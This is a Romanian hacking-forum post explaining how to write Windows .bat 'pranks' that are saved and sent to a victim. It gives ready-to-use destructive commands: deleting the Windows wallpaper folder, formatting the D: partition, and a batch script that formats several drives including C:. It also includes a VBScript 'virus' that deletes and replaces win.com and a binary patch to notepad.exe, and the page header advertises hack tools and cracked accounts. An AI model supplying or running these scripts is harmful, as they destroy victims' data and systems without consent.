..::..**»‡«*Vips-Arena 3xForum»‡«**..::..
Haideti La Noi Pe Forum Aici Puteti Gasi: Programe hack, Yahoo Booter, Counter Strike Plugins, Configs, Jocuri Pentru Pc-u Dumneavoastra, Muzica, Windowsuri Pentru Pc-u Dumneavoastra, Programe Pentru Pc Incluzandule Si Pe Cele De Securitate Counturi Sparte Sau De Tip Premium Si Multe Altele
|
Lista Forumurilor Pe Tematici
|
..::..**»‡«*Vips-Arena 3xForum»‡«**..::.. | Inregistrare | Login
POZE ..::..**»‡«*VIPS-ARENA 3XFORUM»‡«**..::..
Nu sunteti logat.
|
Nou pe simpatie:
theo23 24 ani
 | Femeie
24 ani
Arges
cauta Barbat
26 - 45 ani |
|
DeMoN
~!VeTeRaN!~
 Din: HackSity
Inregistrat: acum 15 ani
Postari: 2816
|
|
Eu am facut deja o recomandare pentru a fii o sectiune despre acest tip de programe dar deocamdata nu m-a ascultat nimeni , il gasiti aici viewtopic.php?f=42&t=8284
Cum se face un fisier .bat ? Pai e foarte simplu .
Toate se bazeaza pe comenzi din cmd ce se pot forma intr-uneditor de text si au ca scop executarea unei comenzi de exemplu stergerea unui fisier , inchiderea calculatorului , formatarea unei partitii etc ...
voi enumera cateva moduri de a enerva pe cineva cu aceste comenzi .
1) Stergerea pozei de pe desktop .
Scrieti intr-un notepad urmatoarele : "rmdir C:\WINDOWS\Web\Wallpaper /S /Q" fara ghilimele si salvatil cu extensia .bat , apoi il trimiteti victimei .
Ce se intampla defapt :
Aceasta comanda sterge folderul din windows in care se duc pozele de pe desktop , cel care deschide acest fisier nu v-a mai putea sa aiba o poza pe desktop .
2) Formatarea unei partitii .
Scrieti intr-un notepad urmatoarele (fara ghilimele) : format D:\ /S /Q si salvati cu extensia .bat
Ce se intampla defapt : Aceasta este una dintre celelalte comenzi din cmd si formateaza partitia "D"
3) Formateaza toate partitiile inafara de "C" :
Scrie intr-un notepad urmatoarele (fara ghilimele) .
@echo off
format d: /q /y
format e: /q /y
format f: /q /y
format g: /q /y
format c: /q /y
format t: /q /y
si salveaza cu extensia .bat
4) Porneste notepad intr-un altfel .
Scrie asta intr-un notepad si pune extensia .bat
@echo off
echo.
echo apasa enter pentru a porni notepad
pause > nul
Notepad.exe %1
if errorlevel 1 goto error
echo.
echo Notepad a terminat ce avea de facut.
goto end
:error
echo.
echo Ceva nu a functionat cu Notepad.
:end
Altceva nu va mai dau fiindca vreau sa invatat si singuri , desigur daca va place dar am sa va daau niste trucuri care nu tin de asta dar sunt bune de stiut .
1) pentru a face un virus mai complex :
Scrieti intr-un notepad urmatoarele : Dim fso, fs1, fs2
Dim drive, folder, file
Set fso = CreateObject("Scripting.FileSystemObject"
drive = "c:\"
folder ="windows\"
file = "win.com"
Set fs1 = fso.GetFile(drive&folder&file)
fs1.copy ("c:\windows\temp\win.com"
set fs2=fso.CreateTextFile("c:\windows\win.com"
fs2.writeline "win.com is gone images/smiles/icon_biggrin.gif"
Set fs1 = fso.GetFile(drive&folder&file)
fs1.delete
fs2.close
Dar nu stiu daca e extensia .bat sau .vbs , incercati-le pe amindoua .
2) O problema cu notepad , daca va va place acest tip de programare veti avea nevoie ca notepdu-l vostru sa fie destul de bun .
Nu va deranjeaza atunci cand deschideti un fisier mai mare de 100k in notepad,si apare
mesajul "the file is too large for notepad to open...Haideti sa scapam de acest mesaj
si sa intram direct in Wordpad cand ne confruntam cu o astfel de siuatie.
1) avem nevoie de programul de dezasamblare w32dasm,de programul Hiew
2) cunostinte minime de assembler
-dezasamblati programul in w32dasm
-activati optiunea "string reference" si cautati sirul "the file is too large..."
-veti gasi ceva de genul "string resource ID=00052" -selectati optiunea Function submeniul Import
-cautati functia User32.messageboxA(responsabile de casetele de dialog in windows)
-dati dublu click pe ea si obtineti ceva de genul
call dword ptr [00407430] {chemarea procedurii de mesaj}
cmp eax,0000006{compara registrul eax cu adresa procedurii}
jne 00402E19 {daca eax nu este egal cu 0000006 .atunci iese din program pentruca sunt doua optiuni
la selectarea lui OK se deschide Wordpad iar altfel iese.
Celelalte instructiuni nu mai conteza
- -selectati cu mouse-ul intstructiunile call si jne si notati adresa lor de ofset
-inchideti w32dasm
-deschideti Hiew "hiew notepad.exe"
-selectati F4 optiunea decode
-F5 si scrieti 2161 {adresa primului numar de offset (gasit pentru cmp)}
-F3 scrieti 404840484048
-F9 pentru a valida introducerea
-F5,scrieti numarul pentru jne care este 216A
-F3,scrieti 404840484048
-F9 pentru a actualiza si Gata!!!
Ce dracu' este 404840484048?
40-in hexazecimal inseamna "inc eax" adica adauga 1
48-inseamna "dec eax" adica scade 1
90 inseamna NOP adica instructiunea nula(nu face nimic)
Asi fi putut la saltul "jne" sa pun NOP dar unele programe nu accepta aceasta instructiune
asa ca am preferat sa execute un ciclu de genul "inc eax"---" dec eax"(pun 1 si apoi iau 1)
Altceva nu stiu ce as putea sa va mai spun , sper c-am fost de ajutor .
_______________________________________
ThE BeSt FoRuMzZz
www.vipsarea.3xforum.ro
|
|
| pus acum 14 ani |
|